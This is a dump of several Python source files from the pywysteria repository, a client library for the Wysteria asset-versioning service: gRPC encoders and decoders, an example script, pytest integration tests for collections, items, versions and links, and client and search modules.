Dst=o.destination,\n Name=o.name,\n Facets=self._encode_dict(o.facets),\n )\n\n @staticmethod\n def _encode_dict(data: dict):\n s = Struct()\n for key, value in data.items():\n s.update({str(key): str(value)})\n return s\n\n # -- Decoders\n def _decode_collection(self, o: pb.Collection):\n \"\"\"\n\n Args:\n o: pb.Collection\n\n Returns:\n domain.Collection\n\n \"\"\"\n return domain.Collection(\n self,\n id=o.Id,\n uri=o.Uri,\n name=o.Name,\n parent=o.Parent,\n facets=dict(o.Facets or {}),\n )\n\n def _decode_item(self, o: pb.Item):\n \"\"\"\n\n Args:\n o: pb.Item\n\n Returns:\n domain.Item\n\n \"\"\"\n return domain.Item(\n self,\n id=o.Id,\n uri=o.Uri,\n parent=o.Parent,\n facets=dict(o.Facets or {}),\n itemtype=o.ItemType,\n variant=o.Variant,\n )\n\n def _decode_version(self, o: pb.Version):\n \"\"\"\n\n Args:\n o: pb.Version\n\n Returns:\n domain.Version\n\n \"\"\"\n return domain.Version(\n self,\n id=o.Id,\n uri=o.Uri,\n parent=o.Parent,\n facets=dict(o.Facets or {}),\n number=o.Number,\n )\n\n def _decode_resource(self, o: pb.Resource):\n \"\"\"\n\n Args:\n o: pb.Resource\n\n Returns:\n domain.Resource\n\n \"\"\"\n return domain.Resource(\n self,\n parent=o.Parent,\n name=o.Name,\n resourcetype=o.ResourceType,\n id=o.Id,\n uri=o.Uri,\n facets=dict(o.Facets or {}),\n location=o.Location,\n )\n\n def _decode_link(self, o: pb.Link):\n \"\"\"\n\n Args:\n o: pb.Link\n\n Returns:\n domain.Link\n\n \"\"\"\n return domain.Link(\n self,\n name=o.Name,\n id=o.Id,\n uri=o.Uri,\n facets=dict(o.Facets or {}),\n src=o.Src,\n dst=o.Dst,\n )\n\n\nif __name__ == \"__main__\":\n from wysteria.utils import from_config\n\n def p(x):\n print(x.id, x.name, x.parent)\n\n c = from_config(\"/home/quintas/go/src/github.com/voidshard/pywysteria/wysteria-client.ini\")\n c.connect()\n\n col = c.get_collection(\"foo\")\n scol = c.get_collection(\"bar\")\n\n print(\"\\n\", \"all\")\n for i in c.search().find_collections():\n p(i)\n\n print(\"\\n\", \"children of v1\", col.id)\n for i in c.search().params(parent=col.id).find_collections():\n p(i)\n\n print(\"\\n\", \"children of v2\", col.id)\n children = col.get_collections()\n for i in children:\n p(i)\n\n print(\"\\n\", \"parent of\", scol.id)\n p(scol.get_parent())\n\n c.close()\n" }, { "alpha_fraction": 0.6129754185676575, "alphanum_fraction": 0.6174496412277222, "avg_line_length": 26.9375, "blob_id": "9c1c1fabd756b20adc30a5ea2da078477c969052", "content_id": "eb9e22be5d79708069810a189ab4304365ef462a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 894, "license_type": "permissive", "max_line_length": 79, "num_lines": 32, "path": "/examples/05/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample05: Updating facets\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n\n # Wysteria will have added some facets auto-magically for us,\n # and it pays when searching for Versions to be as specific as possible\n search.params(facets={\n wysteria.FACET_COLLECTION: \"maps\",\n wysteria.FACET_ITEM_TYPE: \"2dmap\",\n wysteria.FACET_ITEM_VARIANT: \"forest\",\n })\n\n # grab the version we made earlier\n forest_version = search.find_versions()[0]\n\n # we can also add more facets after object creation so you can\n # search for custom fields. The idea is to keep these small, metadata,\n # tags and short strings.\n forest_version.update_facets(publisher=\"batman\")\n print(\"metadata added\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5408560037612915, "alphanum_fraction": 0.5481517314910889, "avg_line_length": 23.470237731933594, "blob_id": "9fcdf3e39d1b141cb5df97b72d607c774a003319", "content_id": "29aeb585d5df4d17ef575868e5f4a604d6444726", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4112, "license_type": "permissive", "max_line_length": 81, "num_lines": 168, "path": "/tests/integration/tests/domain/collection_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestCollection:\n \"\"\"Tests for the Collection class\"\"\"\n\n def _single_collection(self, id_):\n \"\"\"Get a collection by it's id\n \"\"\"\n search = self.client.search()\n search.params(id=id_)\n result = search.find_collections(limit=1)\n assert len(result) == 1\n return result[0]\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_update_facets(self):\n # arrange\n expected = {\"published_by\": \"batman\", \"foobar\": \"98172*(!@G*G&19832hOI&\"}\n col = self.client.create_collection(_rs())\n\n # act\n col.update_facets(**expected)\n remote = self._single_collection(col.id)\n\n # assert\n for k, v in expected.items():\n assert col.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_child_collection(self):\n # arrange\n parent = self.client.create_collection(_rs())\n\n # act\n child = parent.create_collection(_rs())\n rparent = child.get_parent()\n rchildren = parent.get_collections()\n\n # assert\n assert child.parent == parent.id\n assert rparent == parent\n assert rchildren == [child]\n\n def test_delete_collection(self):\n # arrange\n col = self.client.create_collection(_rs())\n\n s = self.client.search()\n s.params(id=col.id)\n\n # act\n col.delete()\n\n result = s.find_collections(limit=2)\n\n # assert\n assert not result\n\n def test_find_collection_by_facets(self):\n # arrange\n facets = {\n \"published_by\": \"zap\",\n }\n\n expected = [\n self.client.create_collection(_rs(), facets=facets),\n self.client.create_collection(_rs(), facets=facets),\n ]\n\n not_expected = [\n self.client.create_collection(_rs()),\n ]\n\n s = self.client.search()\n s.params(facets=facets)\n\n # act\n result = s.find_collections(limit=10)\n\n # assert\n assert len(result) == len(expected)\n for r in result:\n assert r in expected\n assert r not in not_expected\n\n def test_find_collection_by_name(self):\n # arrange\n name1 = _rs()\n name2 = _rs()\n\n col1 = self.client.create_collection(name1)\n self.client.create_collection(name2)\n\n s = self.client.search()\n s.params(name=name1)\n\n # act\n result = s.find_collections(limit=2)\n\n # assert\n assert len(result) == 1\n assert result[0] == col1\n\n def test_find_collection_by_id(self):\n # arrange\n name = _rs()\n col = self.client.create_collection(name)\n s = self.client.search()\n s.params(id=col.id)\n\n # act\n result = s.find_collections(limit=2)\n\n # assert\n assert len(result) == 1\n assert result[0] == col\n\n def test_create_collection_raises_on_duplicate(self):\n # arrange\n name = _rs()\n self.client.create_collection(name)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.client.create_collection(name)\n\n def test_create_collection_creates_remote_collection(self):\n # arrange\n name = _rs()\n facets = {\"foo\": \"bar\"}\n\n # act\n lresult = self.client.create_collection(name, facets=facets)\n rresult = self._single_collection(lresult.id)\n\n # assert\n for r in [lresult, rresult]:\n assert r\n assert r.name == name\n assert r.id\n assert r.uri\n assert r.facets\n\n assert rresult == lresult\n for k, v in facets.items():\n assert rresult.facets[k] == v\n assert lresult.facets[k] == v\n\n" }, { "alpha_fraction": 0.5115140676498413, "alphanum_fraction": 0.5229374170303345, "avg_line_length": 24.41474723815918, "blob_id": "b25591453dfca35fb3699c78bd9952da7a6f5e45", "content_id": "dd5807e520b7e1bde31181e5df57ef08afe094df", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5515, "license_type": "permissive", "max_line_length": 72, "num_lines": 217, "path": "/tests/integration/tests/domain/link_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestLink:\n \"\"\"Tests for the Link class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n cls.item1 = cls.collection.create_item(_rs(), _rs())\n cls.item2 = cls.collection.create_item(_rs(), _rs())\n cls.version1 = cls.item1.create_version()\n cls.version2 = cls.item2.create_version()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def _single_link(self, id_):\n \"\"\"Return a single link by Id\n\n Args:\n id_:\n\n Returns:\n Link\n \"\"\"\n s = self.client.search()\n s.params(id=id_)\n results = s.find_links(limit=1)\n assert results\n return results[0]\n\n def test_links_are_deleted_when_version_is_deleted(self):\n # arrange\n v1 = self.item1.create_version()\n v2 = self.item2.create_version()\n\n l1 = v1.link_to(_rs(), v2)\n l2 = v2.link_to(_rs(), v1)\n\n s = self.client.search()\n s.params(id=l1.id)\n s.params(id=l2.id)\n\n # act\n v1.delete()\n\n results = s.find_links(limit=3)\n\n # assert\n assert not results\n\n def test_links_are_deleted_when_item_is_deleted(self):\n # arrange\n v1 = self.collection.create_item(_rs(), _rs())\n v2 = self.collection.create_item(_rs(), _rs())\n\n l1 = v1.link_to(_rs(), v2)\n l2 = v2.link_to(_rs(), v1)\n\n s = self.client.search()\n s.params(id=l1.id)\n s.params(id=l2.id)\n\n # act\n v1.delete()\n\n results = s.find_links(limit=3)\n\n # assert\n assert not results\n\n def test_raises_on_duplicate_item_link(self):\n # arrange\n name = _rs()\n self.item1.link_to(name, self.item2)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.item1.link_to(name, self.item2)\n\n def test_raises_on_duplicate_version_link(self):\n # arrange\n name = _rs()\n self.version1.link_to(name, self.version2)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.version1.link_to(name, self.version2)\n\n def test_raises_on_self_link_item(self):\n # arrange\n name = _rs()\n\n # act & assert\n with pytest.raises(wysteria.errors.IllegalOperationError):\n self.item1.link_to(name, self.item1)\n\n def test_raises_on_self_link_version(self):\n # arrange\n name = _rs()\n\n # act & assert\n with pytest.raises(wysteria.errors.IllegalOperationError):\n self.version1.link_to(name, self.version1)\n\n def test_raises_on_cross_object_link(self):\n # arrange\n name = _rs()\n\n # act & assert\n with pytest.raises(ValueError):\n self.version1.link_to(name, self.item1)\n\n with pytest.raises(ValueError):\n self.item1.link_to(name, self.version1)\n\n def test_update_facets_version_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n lnk = self.version1.link_to(name, self.version2)\n\n # act\n lnk.update_facets(**facets)\n remote = self._single_link(lnk.id)\n\n # assert\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n\n def test_update_facets_item_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n lnk = self.item1.link_to(name, self.item2)\n\n # act\n lnk.update_facets(**facets)\n remote = self._single_link(lnk.id)\n\n # assert\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_version_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n lnk = self.version1.link_to(name, self.version2, facets=facets)\n remote = self._single_link(lnk.id)\n\n # assert\n assert lnk\n assert remote\n assert lnk == remote\n assert lnk.destination == remote.destination == self.version2.id\n assert lnk.source == remote.source == self.version1.id\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_item_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n lnk = self.item1.link_to(name, self.item2, facets=facets)\n remote = self._single_link(lnk.id)\n\n # assert\n assert lnk\n assert remote\n assert lnk == remote\n assert lnk.destination == remote.destination == self.item2.id\n assert lnk.source == remote.source == self.item1.id\n assert lnk.id\n assert lnk.uri\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n" }, { "alpha_fraction": 0.5771689414978027, "alphanum_fraction": 0.5780822038650513, "avg_line_length": 20.899999618530273, "blob_id": "e3d24ff7bc74f1abd5854c891caaa99783ba2e7a", "content_id": "9baa1a9ba303b1ab5553c4c51f6b0be205b2bb21", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "permissive", "max_line_length": 56, "num_lines": 50, "path": "/tests/integration/tests/client_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestClient:\n \"\"\"Tests for the client class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_get_item_returns_desired_item(self):\n # arrange\n col = self.client.create_collection(_rs())\n item = col.create_item(_rs(), _rs())\n col.create_item(_rs(), _rs())\n\n # act\n result = self.client.get_item(item.id)\n\n # assert\n assert result == item\n\n def test_get_collection_returns_by_name_or_id(self):\n # arrange\n col = self.client.create_collection(_rs())\n self.client.create_collection(_rs())\n\n # act\n iresult = self.client.get_collection(col.id)\n nresult = self.client.get_collection(col.name)\n\n # assert\n assert col == iresult\n assert col == nresult\n" }, { "alpha_fraction": 0.5175155401229858, "alphanum_fraction": 0.5285714268684387, "avg_line_length": 26.380952835083008, "blob_id": "5a46c19893715f1a83de87f9078b7830018fa77f", "content_id": "d2f2801b2752956e3d17ece669eef11274cb544f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8050, "license_type": "permissive", "max_line_length": 88, "num_lines": 294, "path": "/tests/integration/tests/domain/item_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport random\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestItem:\n \"\"\"Tests for the item class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_create_version_itterates_versions_by_item(self):\n \"\"\"Each item has it's own highest version number\"\"\"\n # arrange\n item1 = self.collection.create_item(_rs(), _rs())\n item2 = self.collection.create_item(_rs(), _rs())\n item1_version_numbers = [1, 2, 3]\n item2_version_numbers = [1, 2]\n\n # act\n versions1 = [\n item1.create_version(),\n item1.create_version(),\n item1.create_version(),\n ]\n versions2 = [\n item2.create_version(),\n item2.create_version(),\n ]\n\n # assert\n assert item1_version_numbers == [v.version for v in versions1]\n assert item2_version_numbers == [v.version for v in versions2]\n\n for v in versions1:\n assert v not in versions2\n for v in versions2:\n assert v not in versions1\n\n def test_publish_version_sets_given_version_as_published(self):\n \"\"\"Regardless of what version is published, get_published() should return it.\n\n That is, it's perfectly acceptable to have versions 1-100, but have version 5 as\n the published one.\n \"\"\"\n # arrange\n item = self.collection.create_item(_rs(), _rs())\n versions = [\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n item.create_version(),\n ]\n\n for i in range(0, 20):\n pver = random.choice(versions)\n\n # act\n pver.publish()\n\n # assert\n result = item.get_published()\n assert result == pver\n\n def test_update_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n item = self.collection.create_item(_rs(), _rs())\n\n # act\n item.update_facets(**facets)\n remote = self.client.get_item(item.id)\n\n # assert\n for k, v in facets.items():\n assert item.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_version_itterates_versions(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n item = self.collection.create_item(_rs(), _rs())\n expect_version_numbers = [1, 2, 3, 4, 5]\n\n # act\n versions = [\n item.create_version(facets),\n item.create_version(facets),\n item.create_version(facets),\n item.create_version(facets),\n item.create_version(facets),\n ]\n\n numbers = [v.version for v in versions]\n\n # assert\n assert numbers == expect_version_numbers\n for ver in versions:\n assert ver.parent == item.id\n for k, v in facets.items():\n assert ver.facets[k] == v\n\n def test_duplicate_item_different_parent_doesnt_raise(self):\n # arrange\n type_ = _rs()\n variant = _rs()\n\n self.collection.create_item(type_, variant)\n another_collection = self.client.create_collection(_rs())\n\n # act\n another_collection.create_item(type_, variant)\n\n # assert\n assert True\n\n def test_duplicate_item_raises(self):\n # arrange\n type_ = _rs()\n variant = _rs()\n\n self.collection.create_item(type_, variant)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.collection.create_item(type_, variant)\n\n def test_link_items(self):\n # arrange\n self.collection.create_item(_rs(), _rs())\n\n # Desired link pattern\n #\n # +---[foo]---> item2\n # item1----|\n # +---[foo]---> item2\n #\n #\n # item(2/3) ----[bar]---> item1\n #\n item1 = self.collection.create_item(_rs(), _rs())\n item2 = self.collection.create_item(_rs(), _rs())\n item3 = self.collection.create_item(_rs(), _rs())\n\n # act\n item1_link_name = \"foo\"\n item1.link_to(item1_link_name, item2)\n item1.link_to(item1_link_name, item3)\n\n item23_link_name = \"bar\"\n item2.link_to(item23_link_name, item1)\n item3.link_to(item23_link_name, item1)\n\n # assert\n item1_linked = item1.get_linked()\n item2_linked = item2.get_linked()\n\n assert isinstance(item1_linked, dict)\n assert isinstance(item2_linked, dict)\n\n assert item1_link_name in item1_linked\n for l in item1_linked.get(item1_link_name, []):\n assert l in [item2, item3]\n\n assert item23_link_name in item2_linked\n assert item2_linked.get(item23_link_name, []) == [item1]\n\n def test_delete_item(self):\n # arrange\n item = self.collection.create_item(_rs(), _rs())\n\n # act\n item.delete()\n remote = self.client.get_item(item.id)\n\n # assert\n assert not remote\n\n def test_find_item_by_facets(self):\n # arrange\n facets = {\"fofofofooitems\": _rs()}\n expected = [\n self.collection.create_item(_rs(), _rs(), facets=facets),\n self.collection.create_item(_rs(), _rs(), facets=facets),\n ]\n not_expected = [self.collection.create_item(_rs(), _rs())]\n\n s = self.client.search()\n s.params(facets=facets)\n\n # act\n results = s.find_items(limit=10)\n\n # assert\n assert len(results) == len(expected)\n for r in results:\n assert r in expected\n assert r not in not_expected\n\n def test_find_item_by_variant(self):\n # arrange\n variant = _rs()\n expected =[\n self.collection.create_item(_rs(), variant),\n self.collection.create_item(_rs(), variant),\n ]\n not_expected = [self.collection.create_item(_rs(), _rs())]\n\n s = self.client.search()\n s.params(item_variant=variant)\n\n # act\n results = s.find_items(limit=10)\n\n # assert\n assert len(results) == len(expected)\n for r in results:\n assert r in expected\n assert r not in not_expected\n\n def test_find_item_by_type(self):\n # arrange\n type_ = _rs()\n expected =[\n self.collection.create_item(type_, _rs()),\n self.collection.create_item(type_, _rs()),\n ]\n not_expected = [self.collection.create_item(_rs(), _rs())]\n\n s = self.client.search()\n s.params(item_type=type_)\n\n # act\n results = s.find_items(limit=10)\n\n # assert\n assert len(results) == len(expected)\n for r in results:\n assert r in expected\n assert r not in not_expected\n\n def test_create_item(self):\n # arrange\n facets = {\n \"awesomefoo\": _rs(),\n \"awesomebar\": _rs(),\n }\n\n # act\n item = self.collection.create_item(_rs(), _rs(), facets=facets)\n ritem = self.client.get_item(item.id)\n\n # assert\n assert item\n assert ritem\n assert item == ritem\n assert item.id\n assert ritem.id\n assert item.uri\n assert ritem.uri\n for k, v in facets.items():\n assert item.facets[k] == v\n assert ritem.facets[k] == v\n" }, { "alpha_fraction": 0.49339935183525085, "alphanum_fraction": 0.5082508325576782, "avg_line_length": 22.30769157409668, "blob_id": "3c034edd213e25d058f7393d760b41b014947281", "content_id": "8778cbb3e999cb7e27360bced64c43fa10f71790", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3636, "license_type": "permissive", "max_line_length": 62, "num_lines": 156, "path": "/tests/integration/tests/domain/version_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestVersion:\n \"\"\"Tests for the Version class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n cls.item = cls.collection.create_item(_rs(), _rs())\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_delete_version(self):\n # arrange\n version = self.item.create_version()\n s = self.client.search()\n s.params(id=version.id)\n\n # act\n version.delete()\n remote = s.find_versions(limit=1)\n\n # assert\n assert not remote\n\n def test_resources_are_deleted_when_version_deleted(self):\n # arrange\n v = self.item.create_version()\n\n r1 = v.add_resource(_rs(), _rs(), _rs())\n r2 = v.add_resource(_rs(), _rs(), _rs())\n\n s = self.client.search()\n s.params(id=r1.id)\n s.params(id=r2.id)\n\n # act\n v.delete()\n\n results = s.find_resources(limit=3)\n\n # assert\n assert not results\n\n def test_link_versions(self):\n # arrange\n\n # Desired link pattern\n #\n # +---[foo]---> v2\n # v1----|\n # +---[foo]---> v3\n #\n #\n # v(2/3) ----[bar]---> v1\n #\n v1 = self.item.create_version()\n v2 = self.item.create_version()\n v3 = self.item.create_version()\n\n # act\n v1_link_name = \"foo\"\n v1.link_to(v1_link_name, v2)\n v1.link_to(v1_link_name, v3)\n\n v23_link_name = \"bar\"\n v2.link_to(v23_link_name, v1)\n v3.link_to(v23_link_name, v1)\n\n # assert\n v1_linked = v1.get_linked()\n v2_linked = v2.get_linked()\n\n assert isinstance(v1_linked, dict)\n assert isinstance(v2_linked, dict)\n\n assert v1_link_name in v1_linked\n for l in v1_linked.get(v1_link_name, []):\n assert l in [v2, v3]\n\n assert v23_link_name in v2_linked\n assert v2_linked.get(v23_link_name, []) == [v1]\n\n def _single_version(self, id_):\n \"\"\"Return a single version by Id\n\n Args:\n id_:\n\n Returns:\n Version\n \"\"\"\n s = self.client.search()\n s.params(id=id_)\n result = s.find_versions(limit=1)\n assert result\n return result[0]\n\n def test_update_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n version = self.item.create_version()\n\n # act\n version.update_facets(**facets)\n remote = self._single_version(version.id)\n\n # assert\n assert version\n assert remote\n assert version == remote\n for k, v in facets.items():\n assert version.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_version_sets_facets(self):\n # arrange\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n version = self.item.create_version(facets)\n remote = self._single_version(version.id)\n\n # assert\n assert version\n assert remote\n assert version == remote\n assert version.id\n assert version.uri\n assert remote.id\n assert remote.uri\n for k, v in facets.items():\n assert version.facets[k] == v\n assert remote.facets[k] == v\n" }, { "alpha_fraction": 0.587597668170929, "alphanum_fraction": 0.5888580679893494, "avg_line_length": 25.804054260253906, "blob_id": "884b4b448d5324073bf893c02386efd7efe203fa", "content_id": "7b591e57c11335484afa39db83f61a5c9695f382", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3967, "license_type": "permissive", "max_line_length": 84, "num_lines": 148, "path": "/wysteria/client.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nfrom copy import copy\n\nfrom wysteria.middleware import NatsMiddleware\nfrom wysteria.middleware import GRPCMiddleware\nfrom wysteria import constants as consts\nfrom wysteria.errors import UnknownMiddlewareError\nfrom wysteria.domain import Collection, QueryDesc\nfrom wysteria.search import Search\n\n\n_KEY_MIDDLEWARE_NATS = \"nats\"\n_KEY_MIDDLEWARE_GRPC = \"grpc\"\n_AVAILABLE_MIDDLEWARES = {\n _KEY_MIDDLEWARE_NATS: NatsMiddleware,\n _KEY_MIDDLEWARE_GRPC: GRPCMiddleware,\n}\n_DEFAULT_MIDDLEWARE = _KEY_MIDDLEWARE_GRPC\n\n\nclass Client:\n \"\"\"WysteriaClient wraps a middleware class and provides convenience.\n\n Although technically the middleware could be used directly, this\n client allows us to alter the middleware later on without needing to change\n anything client facing.\n\n \"\"\"\n\n def __init__(self, url=None, middleware=_KEY_MIDDLEWARE_NATS, tls=None):\n \"\"\"\n\n Args:\n url (str):\n middleware (str): the name of an available middleware\n tls: a named tuple of our tls options (see utils.py)\n\n \"\"\"\n cls = _AVAILABLE_MIDDLEWARES.get(middleware.lower())\n if not cls:\n raise UnknownMiddlewareError(\"Unknown middleware '%s'\" % middleware)\n\n self._conn = cls(url=url, tls=tls)\n\n def connect(self):\n \"\"\"Connect to wysteria - used if you do not wish to use 'with'\n \"\"\"\n self._conn.connect()\n\n def close(self):\n \"\"\"Disconnect from wysteria - used if you do not wish to use 'with'\n \"\"\"\n try:\n self._conn.close()\n except Exception:\n pass # prevent the middleware from raising when we call close on it\n\n def __enter__(self):\n \"\"\"Connect to remote host(s)\"\"\"\n self.connect()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"Close connection(s) to remote host\"\"\"\n self.close()\n\n def search(self):\n \"\"\"Start a new search\n\n Returns:\n wysteria.Search\n \"\"\"\n return Search(self._conn)\n\n @property\n def default_middleware(self) -> str:\n \"\"\"Return the default middleware name\n\n Returns:\n str\n \"\"\"\n return _DEFAULT_MIDDLEWARE\n\n @staticmethod\n def available_middleware() -> list:\n \"\"\"Return a list of the available middleware\n\n Returns:\n []str\n \"\"\"\n return list(_AVAILABLE_MIDDLEWARES.keys())\n\n def create_collection(self, name: str, facets: dict=None):\n \"\"\"Create a collection with the given name.\n\n Note: Only one collection is allowed with a given name.\n\n Args:\n name (str): name for new collection\n facets (dict): facets to set on new collection\n\n Returns:\n domain.Collection\n \"\"\"\n cfacets = copy(facets)\n if not cfacets:\n cfacets = {}\n\n cfacets[consts.FACET_COLLECTION] = cfacets.get(consts.FACET_COLLECTION, \"/\")\n\n c = Collection(self._conn, name=name, facets=cfacets)\n c._id = self._conn.create_collection(c)\n return c\n\n def get_collection(self, identifier):\n \"\"\"Find a collection by either name or id\n\n Args:\n identifier (str): either the name or id of the desired collection\n\n Returns:\n domain.Collection or None\n \"\"\"\n result = self._conn.find_collections([\n QueryDesc().id(identifier),\n QueryDesc().name(identifier),\n QueryDesc().uri(identifier),\n ], limit=2)\n if (not result) or len(result) > 1:\n return None\n return result[0]\n\n def get_item(self, item_id):\n \"\"\"Find & return an item by its ID\n\n Args:\n item_id (str):\n\n Returns:\n domain.Item or None\n \"\"\"\n result = self._conn.find_items([\n QueryDesc().id(item_id),\n ], limit=1)\n if not result:\n return None\n return result[0]\n" }, { "alpha_fraction": 0.5601651072502136, "alphanum_fraction": 0.5614035129547119, "avg_line_length": 29.471698760986328, "blob_id": "9909eace65c93ec998a98d3b06c0f005552e8bdd", "content_id": "b55642872d69158a68544c8b638e14a4f521bc25", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4845, "license_type": "permissive", "max_line_length": 80, "num_lines": 159, "path": "/wysteria/search.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "from wysteria.domain import QueryDesc\nfrom wysteria.constants import DEFAULT_QUERY_LIMIT\n\n\nclass Search(object):\n \"\"\"The search object is used to build a query to send to wysteria.\n \"\"\"\n\n def __init__(self, conn):\n self._conn = conn\n self._query = []\n\n def params(\n self,\n id: str=\"\",\n uri: str=\"\",\n name: str=\"\",\n parent: str=\"\",\n version_number: int=0,\n item_type: str=\"\",\n item_variant: str=\"\",\n facets: dict=None,\n resource_type: str=\"\",\n resource_location: str=\"\",\n link_source: str=\"\",\n link_destination: str=\"\"\n ):\n \"\"\"Append the given query description to the query we're going to\n launch. Objects returned will be required to match all of the terms\n specified on at least one of the query description objects.\n\n That is, the terms on each individual QueryDesc obj are considered \"AND\"\n and each QueryDesc in a list of QueryDesc objs are considered \"OR\" when\n taken together.\n\n Args:\n id (str):\n uri (str):\n name (str):\n parent (str):\n version_number (int):\n item_type (str):\n item_variant (str):\n facets (dict):\n resource_type (str):\n resource_location (str):\n link_source (str):\n link_destination (str):\n\n Returns:\n bool\n \"\"\"\n if not facets:\n facets = {}\n\n qd = QueryDesc()\\\n .id(id)\\\n .uri(uri)\\\n .name(name)\\\n .parent(parent)\\\n .version_number(version_number)\\\n .item_type(item_type)\\\n .item_variant(item_variant)\\\n .has_facets(**facets)\\\n .resource_type(resource_type)\\\n .resource_location(resource_location)\\\n .link_source(link_source)\\\n .link_destination(link_destination)\n\n self._query.append(qd)\n return self\n\n def _generic_run_query(self, find_func, limit: int, offset: int):\n \"\"\"Run the built query and return matching collections\n\n Returns:\n []domain.?\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return find_func(self._query, limit=limit, offset=offset)\n\n def find_collections(self, limit: int=DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching collections\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from offset\n\n Returns:\n []domain.Collection\n\n Raises:\n wysteria.errors.InvalidQuery if no search terms given\n \"\"\"\n return self._generic_run_query(\n self._conn.find_collections, limit, offset\n )\n\n def find_items(self, limit: int=DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Run the built query and return matching items\n\n Args:\n limit (int): limit returned results\n offset (int): return results starting from 